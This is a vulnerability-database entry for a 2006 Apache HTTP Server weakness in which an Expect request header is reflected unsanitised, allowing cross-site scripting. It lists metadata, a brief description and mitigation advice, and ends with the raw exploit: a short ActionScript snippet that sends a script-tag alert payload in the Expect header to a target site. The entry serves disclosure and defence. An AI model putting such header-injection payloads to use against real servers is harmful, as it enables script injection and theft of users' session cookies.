Vendor: HTTP Server
By: SecurityFocus
CVSS: 7.5 (HIGH)
Cookie-based Authentication Credentials Theft
CWE: 20
Product Name: HTTP Server
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2006

Apache HTTP Server Security Weakness

An attacker may exploit this issue to steal cookie-based authentication credentials and launch other attacks. The proof of concept sends an HTTP request whose Expect header contains a script tag with an alert statement.

Mitigation:

Ensure that all user input is properly validated and sanitized before being used in HTTP request headers.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/19661/info

Apache HTTP server is prone to a security weakness related to HTTP request headers.

An attacker may exploit this issue to steal cookie-based authentication credentials and launch other attacks.

var req:LoadVars=new LoadVars();
req.addRequestHeader("Expect",
"<script>alert('gotcha!')</script>");
req.send("http://www.target.site/","_blank","GET");